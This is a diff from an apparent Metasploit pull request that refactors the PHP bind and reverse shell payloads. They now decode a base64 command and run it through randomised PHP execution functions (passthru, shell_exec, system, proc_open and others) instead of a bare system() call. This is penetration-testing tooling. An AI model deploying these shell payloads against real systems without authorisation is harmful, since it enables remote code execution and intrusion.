Merge pull request rapid7#19466 from jvoisin/singles_php

Use php_preamble/php_system_block instead of `system` in payloads/singles/php/

Author: jheysel-r7

lib/msf/core/payload/php.rb

@@ -134,7 +134,7 @@ def php_system_block(options = {})
       }
     "
 
-    exec_methods = [passthru, shell_exec, system, exec, proc_open, popen];
+    exec_methods = [passthru, shell_exec, system, exec, proc_open, popen]
     exec_methods = exec_methods.shuffle
     buf = setup + exec_methods.join("") + fail_block
 

modules/payloads/singles/php/bind_perl.rb

@@ -6,10 +6,11 @@
 
 module MetasploitModule
 
-  CachedSize = 230
+  CachedSize = :dynamic
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Php
 
   def initialize(info = {})
     super(merge_info(info,
@@ -34,7 +35,14 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #

modules/payloads/singles/php/bind_perl_ipv6.rb

@@ -6,10 +6,11 @@
 
 module MetasploitModule
 
-  CachedSize = 230
+  CachedSize = :dynamic
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
+  include Msf::Payload::Php
 
   def initialize(info = {})
     super(merge_info(info,
@@ -34,7 +35,14 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    return super + "system(base64_decode('#{Rex::Text.encode_base64(command_string)}'));"
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #

modules/payloads/singles/php/reverse_perl.rb

@@ -35,11 +35,14 @@ def initialize(info = {})
   # Constructs the payload
   #
   def generate(_opts = {})
-    buf = "#{php_preamble}"
-    buf += "$c = base64_decode('#{Rex::Text.encode_base64(command_string)}');"
-    buf += "#{php_system_block({:cmd_varname=>"$c"})}"
-    return super + buf
-
+    vars = Rex::RandomIdentifier::Generator.new
+    dis = "$#{vars[:dis]}"
+    shell = <<-END_OF_PHP_CODE
+              #{php_preamble(disabled_varname: dis)}
+              $c = base64_decode("#{Rex::Text.encode_base64(command_string)}");
+              #{php_system_block(cmd_varname: '$c', disabled_varname: dis)}
+    END_OF_PHP_CODE
+    return super + shell
   end
 
   #

spec/modules/payloads_spec.rb

@@ -2692,7 +2692,7 @@
                           ancestor_reference_names: [
                               'singles/php/bind_perl'
                           ],
-                          dynamic_size: false,
+                          dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'php/bind_perl'
   end
@@ -2702,7 +2702,7 @@
                           ancestor_reference_names: [
                               'singles/php/bind_perl_ipv6'
                           ],
-                          dynamic_size: false,
+                          dynamic_size: true,
                           modules_pathname: modules_pathname,
                           reference_name: 'php/bind_perl_ipv6'
   end